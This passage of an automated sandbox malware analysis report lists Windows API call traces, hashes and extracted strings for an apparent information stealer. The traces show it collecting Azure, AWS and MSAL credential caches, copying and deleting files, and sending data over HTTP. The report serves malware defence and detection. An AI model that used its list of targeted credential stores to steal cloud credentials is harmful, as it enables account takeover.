                                            • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 03039E1D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID:
                                            • API String ID: 2238633743-0
                                            • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                            • Instruction ID: f5a10b7177fda8029e1e73a74c3b9a340f6da4549774883af424f77f25c16bd5
                                            • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                            • Instruction Fuzzy Hash: 36A13BBD5C1240BFE364EFE8ED88AA63BFBF74A201714661AE605C3264D7399441DB12
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 03039047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 03039072
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03029C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 03029C53
                                              • Part of subcall function 03029C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 03029C78
                                              • Part of subcall function 03029C27: LocalAlloc.KERNEL32(00000040,?), ref: 03029C98
                                              • Part of subcall function 03029C27: ReadFile.KERNEL32(000000FF,?,00000000,030216F6,00000000), ref: 03029CC1
                                              • Part of subcall function 03029C27: LocalFree.KERNEL32(030216F6), ref: 03029CF7
                                              • Part of subcall function 03029C27: CloseHandle.KERNEL32(000000FF), ref: 03029D01
                                              • Part of subcall function 03039097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 030390B9
                                            • strtok_s.MSVCRT ref: 03030582
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 030305C9
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 030305D0
                                            • StrStrA.SHLWAPI(00000000,00421618), ref: 030305EC
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 030305FA
                                              • Part of subcall function 03038B47: malloc.MSVCRT ref: 03038B4F
                                              • Part of subcall function 03038B47: strncpy.MSVCRT ref: 03038B6A
                                            • StrStrA.SHLWAPI(00000000,00421620), ref: 03030636
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 03030644
                                            • StrStrA.SHLWAPI(00000000,00421628), ref: 03030680
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0303068E
                                            • StrStrA.SHLWAPI(00000000,00421630), ref: 030306CA
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 030306DC
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 03030769
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 03030781
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 03030799
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 030307B1
                                            • lstrcat.KERNEL32(?,0042164C), ref: 030307C9
                                            • lstrcat.KERNEL32(?,00421660), ref: 030307D8
                                            • lstrcat.KERNEL32(?,00421670), ref: 030307E7
                                            • lstrcat.KERNEL32(?,00000000), ref: 030307FA
                                            • lstrcat.KERNEL32(?,00421678), ref: 03030809
                                            • lstrcat.KERNEL32(?,00000000), ref: 0303081C
                                            • lstrcat.KERNEL32(?,0042167C), ref: 0303082B
                                            • lstrcat.KERNEL32(?,00421680), ref: 0303083A
                                            • lstrcat.KERNEL32(?,00000000), ref: 0303084D
                                            • lstrcat.KERNEL32(?,00421688), ref: 0303085C
                                            • lstrcat.KERNEL32(?,0042168C), ref: 0303086B
                                            • lstrcat.KERNEL32(?,00000000), ref: 0303087E
                                            • lstrcat.KERNEL32(?,00421698), ref: 0303088D
                                            • lstrcat.KERNEL32(?,0042169C), ref: 0303089C
                                            • strtok_s.MSVCRT ref: 030308E0
                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 030308F5
                                            • memset.MSVCRT ref: 03030944
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID:
                                            • API String ID: 3689735781-0
                                            • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                            • Instruction ID: 15e8e6c7ac1a3a36e528bb75c472534c9dc01961a06087060aa966834abddbae
                                            • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                            • Instruction Fuzzy Hash: 4CD15C7AA41308ABCB04FBF4DD85EFEB77DEF96301F544419E142AA090DB34AA05CB61
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                            • StrCmpCA.SHLWAPI(?,02E26370), ref: 00405A13
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02E2B040,00000000,?,02DF4EE0,00000000,?,00421A1C), ref: 00405E71
                                            • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                            • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                            • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                            • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                            • memcpy.MSVCRT(?), ref: 00405EFE
                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                            • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                            • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                            • HttpOpenRequestA.WININET(00000000,02E2AF30,?,02E2A4E0,00000000,00000000,00400100,00000000), ref: 00405BF8
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                            • String ID: "$"$------$------$------
                                            • API String ID: 1406981993-2180234286
                                            • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                            • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                            • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                            • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                            APIs
                                            • memset.MSVCRT ref: 00414D87
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            • memset.MSVCRT ref: 00414E13
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                            • memset.MSVCRT ref: 00414E9F
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                              • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02E26360,?,000003E8), ref: 00414A4A
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                              • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                              • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                            • memset.MSVCRT ref: 00414F2B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                            • API String ID: 4017274736-156832076
                                            • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                            • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                            • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                            • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02DF4EB0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                            • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                            • lstrcatA.KERNEL32(?,00000000,02E26130,00421474,02E26130,00421470,00000000), ref: 0040D208
                                            • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                            • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                            • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                            • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                            • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                            • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                            • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E24D60,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            • lstrlenA.KERNEL32(?), ref: 0040D32A
                                            • lstrlenA.KERNEL32(?), ref: 0040D339
                                            • memset.MSVCRT ref: 0040D388
                                              • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 2775534915-0
                                            • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                            • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                            • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                            • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 03038DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,03021660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 03038DED
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0302D1EA
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0302D32E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0302D335
                                            • lstrcat.KERNEL32(?,00000000), ref: 0302D46F
                                            • lstrcat.KERNEL32(?,00421478), ref: 0302D47E
                                            • lstrcat.KERNEL32(?,00000000), ref: 0302D491
                                            • lstrcat.KERNEL32(?,0042147C), ref: 0302D4A0
                                            • lstrcat.KERNEL32(?,00000000), ref: 0302D4B3
                                            • lstrcat.KERNEL32(?,00421480), ref: 0302D4C2
                                            • lstrcat.KERNEL32(?,00000000), ref: 0302D4D5
                                            • lstrcat.KERNEL32(?,00421484), ref: 0302D4E4
                                            • lstrcat.KERNEL32(?,00000000), ref: 0302D4F7
                                            • lstrcat.KERNEL32(?,00421488), ref: 0302D506
                                            • lstrcat.KERNEL32(?,00000000), ref: 0302D519
                                            • lstrcat.KERNEL32(?,0042148C), ref: 0302D528
                                            • lstrcat.KERNEL32(?,00000000), ref: 0302D53B
                                            • lstrcat.KERNEL32(?,00421490), ref: 0302D54A
                                              • Part of subcall function 0303AA87: lstrlen.KERNEL32(0302516C,?,?,0302516C,00420DDE), ref: 0303AA92
                                              • Part of subcall function 0303AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0303AAEC
                                            • lstrlen.KERNEL32(?), ref: 0302D591
                                            • lstrlen.KERNEL32(?), ref: 0302D5A0
                                            • memset.MSVCRT ref: 0302D5EF
                                              • Part of subcall function 0303ACD7: StrCmpCA.SHLWAPI(0064A350,0302AA0E,?,0302AA0E,0064A350), ref: 0303ACF6
                                            • DeleteFileA.KERNEL32(00000000), ref: 0302D61B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 1973479514-0
                                            • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                            • Instruction ID: d4ddde704d377988e3e9369c40665d71bac799c374440ce9bebc2647f501e724
                                            • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                            • Instruction Fuzzy Hash: CBE15D7AA51218ABCB08FBE0DD94DEE737DAF96301F544159E146AB0A0DF34AE04CF61
                                            APIs
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A51
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A68
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A7F
                                              • Part of subcall function 03024A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03024AA0
                                              • Part of subcall function 03024A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 03024AB0
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 03025C5F
                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 03025C7A
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03025DFA
                                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 030260D8
                                            • lstrlen.KERNEL32(00000000), ref: 030260E9
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 030260FA
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 03026101
                                            • lstrlen.KERNEL32(00000000), ref: 03026116
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 0302612D
                                            • lstrlen.KERNEL32(00000000), ref: 0302613F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 03026158
                                            • memcpy.MSVCRT(?), ref: 03026165
                                            • lstrlen.KERNEL32(00000000,?,?), ref: 03026182
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 03026196
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 030261B3
                                            • InternetCloseHandle.WININET(00000000), ref: 03026217
                                            • InternetCloseHandle.WININET(00000000), ref: 03026224
                                            • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 03025E5F
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                            • InternetCloseHandle.WININET(00000000), ref: 0302622E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                            • String ID:
                                            • API String ID: 1703137719-0
                                            • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                            • Instruction ID: 14840298c73d17a9bd2c9d5dfd38ded625b2cd09e18c6e54e1be6283504e75d2
                                            • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                            • Instruction Fuzzy Hash: 0112047AA21328ABCB15EBA0DD94FEEB37DBF56700F444199A146670A1DF702B48CF50
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02E29370,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                            • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                            • StrStrA.SHLWAPI(?,02E292F8,00420B52), ref: 0040CAF7
                                            • StrStrA.SHLWAPI(00000000,02E29250), ref: 0040CB1E
                                            • StrStrA.SHLWAPI(?,02E298F8,00000000,?,00421458,00000000,?,00000000,00000000,?,02E26110,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                            • StrStrA.SHLWAPI(00000000,02E298D8), ref: 0040CCB9
                                              • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                              • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02E26060), ref: 0040C871
                                              • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                              • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                            • StrStrA.SHLWAPI(?,02E298D8,00000000,?,0042145C,00000000,?,00000000,02E26060), ref: 0040CD5A
                                            • StrStrA.SHLWAPI(00000000,02E26390), ref: 0040CD71
                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                            • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                            • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
